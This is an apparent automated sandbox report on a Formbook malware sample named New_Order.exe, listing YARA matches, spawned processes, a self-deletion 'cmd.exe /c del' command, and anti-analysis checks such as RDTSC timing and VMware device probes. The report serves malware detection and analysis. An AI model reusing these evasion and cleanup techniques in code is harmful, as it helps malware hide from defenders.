          Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@13/8
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
          Source: C:\Users\user\Desktop\New_Order.exeFile created: C:\Users\user\AppData\Local\Temp\nsmC33E.tmpJump to behavior
          Source: New_Order.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\New_Order.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\New_Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: New_Order.exeVirustotal: Detection: 38%
          Source: New_Order.exeReversingLabs: Detection: 59%
          Source: C:\Users\user\Desktop\New_Order.exeFile read: C:\Users\user\Desktop\New_Order.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\New_Order.exe 'C:\Users\user\Desktop\New_Order.exe'
          Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'Jump to behavior
          Source: C:\Users\user\Desktop\New_Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: New_Order.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
          Source: Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
          Source: Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00410109 push eax; iretd 1_2_0041010B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A2F2 push es; ret 1_2_0041A337
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415BFC push ss; ret 1_2_00415BFD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004154D4 push ss; iretd 1_2_004154DC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413E26 pushfd ; iretd 1_2_00413E27
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414EC1 push es; retf 1_2_00414EC2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397D0D1 push ecx; ret 1_2_0397D0E4
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048BD0D1 push ecx; ret 7_2_048BD0E4
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00620109 push eax; iretd 7_2_0062010B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062A2F2 push es; ret 7_2_0062A337
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00625BFC push ss; ret 7_2_00625BFD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062B3B5 push eax; ret 7_2_0062B408
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062B46C push eax; ret 7_2_0062B472
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062B402 push eax; ret 7_2_0062B408
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062B40B push eax; ret 7_2_0062B472
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_006254D4 push ss; iretd 7_2_006254DC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00623E26 pushfd ; iretd 7_2_00623E27
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00624EC1 push es; retf 7_2_00624EC2
          Source: C:\Users\user\Desktop\New_Order.exeFile created: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dllJump to dropped file
          Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 00000000006185E4 second address: 00000000006185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 000000000061897E second address: 0000000000618984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\New_Order.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Windows\explorer.exe TID: 5048Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe TID: 6240Thread sleep time: -44000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
          Source: explorer.exe, 00000002.00000000.258112198.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.244873438.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000002.501665466.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000002.496335851.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.507902104.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409B20 LdrLoadDll,1_2_00409B20
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]0_2_10001000
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_024D1790 mov eax, dword ptr fs:[00000030h]0_2_024D1790
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_024D19A8 mov eax, dword ptr fs:[00000030h]0_2_024D19A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952397 mov eax, dword ptr fs:[00000030h]1_2_03952397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B390 mov eax, dword ptr fs:[00000030h]1_2_0395B390
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E138A mov eax, dword ptr fs:[00000030h]1_2_039E138A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03931B8F mov eax, dword ptr fs:[00000030h]1_2_03931B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03931B8F mov eax, dword ptr fs:[00000030h]1_2_03931B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD380 mov ecx, dword ptr fs:[00000030h]1_2_039DD380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]1_2_03954BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]1_2_03954BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]1_2_03954BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F5BA5 mov eax, dword ptr fs:[00000030h]1_2_039F5BA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h]1_2_039A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h]1_2_039A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]1_2_039503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]1_2_039503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]1_2_039503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]1_2_039503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]1_2_039503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]1_2_039503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394DBE9 mov eax, dword ptr fs:[00000030h]1_2_0394DBE9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E131B mov eax, dword ptr fs:[00000030h]1_2_039E131B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B58 mov eax, dword ptr fs:[00000030h]1_2_039F8B58
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F358 mov eax, dword ptr fs:[00000030h]1_2_0392F358
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392DB40 mov eax, dword ptr fs:[00000030h]1_2_0392DB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h]1_2_03953B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h]1_2_03953B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392DB60 mov ecx, dword ptr fs:[00000030h]1_2_0392DB60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h]1_2_0395D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h]1_2_0395D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h]1_2_0393AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h]1_2_0393AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FAB0 mov eax, dword ptr fs:[00000030h]1_2_0395FAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]1_2_039252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]1_2_039252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]1_2_039252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]1_2_039252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]1_2_039252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952ACB mov eax, dword ptr fs:[00000030h]1_2_03952ACB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952AE4 mov eax, dword ptr fs:[00000030h]1_2_03952AE4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]1_2_03925210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03925210 mov ecx, dword ptr fs:[00000030h]1_2_03925210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]1_2_03925210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]1_2_03925210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h]1_2_0392AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h]1_2_0392AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03943A1C mov eax, dword ptr fs:[00000030h]1_2_03943A1C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h]1_2_039EAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h]1_2_039EAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938A0A mov eax, dword ptr fs:[00000030h]1_2_03938A0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h]1_2_03964A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h]1_2_03964A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]1_2_0394A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]1_2_0394A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]1_2_0394A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]1_2_0394A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]1_2_0394A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]1_2_0394A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]1_2_0394A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]1_2_0394A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]1_2_0394A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EEA55 mov eax, dword ptr fs:[00000030h]1_2_039EEA55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4257 mov eax, dword ptr fs:[00000030h]1_2_039B4257
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]1_2_03929240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]1_2_03929240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]1_2_03929240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]1_2_03929240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396927A mov eax, dword ptr fs:[00000030h]1_2_0396927A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h]1_2_039DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h]1_2_039DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8A62 mov eax, dword ptr fs:[00000030h]1_2_039F8A62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952990 mov eax, dword ptr fs:[00000030h]1_2_03952990
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A185 mov eax, dword ptr fs:[00000030h]1_2_0395A185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C182 mov eax, dword ptr fs:[00000030h]1_2_0394C182
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]1_2_039A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]1_2_039A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]1_2_039A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]1_2_039A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h]1_2_039561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h]1_2_039561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]1_2_039E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]1_2_039E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]1_2_039E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]1_2_039E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A69A6 mov eax, dword ptr fs:[00000030h]1_2_039A69A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]1_2_0392B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]1_2_0392B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]1_2_0392B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B41E8 mov eax, dword ptr fs:[00000030h]1_2_039B41E8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]1_2_03929100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]1_2_03929100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]1_2_03929100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395513A mov eax, dword ptr fs:[00000030h]1_2_0395513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395513A mov eax, dword ptr fs:[00000030h]1_2_0395513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]1_2_03944120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]1_2_03944120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]1_2_03944120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]1_2_03944120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03944120 mov ecx, dword ptr fs:[00000030h]1_2_03944120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h]1_2_0394B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h]1_2_0394B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h]1_2_0392B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h]1_2_0392B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C962 mov eax, dword ptr fs:[00000030h]1_2_0392C962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929080 mov eax, dword ptr fs:[00000030h]1_2_03929080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h]1_2_039A3884
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h]1_2_039A3884
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395F0BF mov ecx, dword ptr fs:[00000030h]1_2_0395F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h]1_2_0395F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h]1_2_0395F0BF
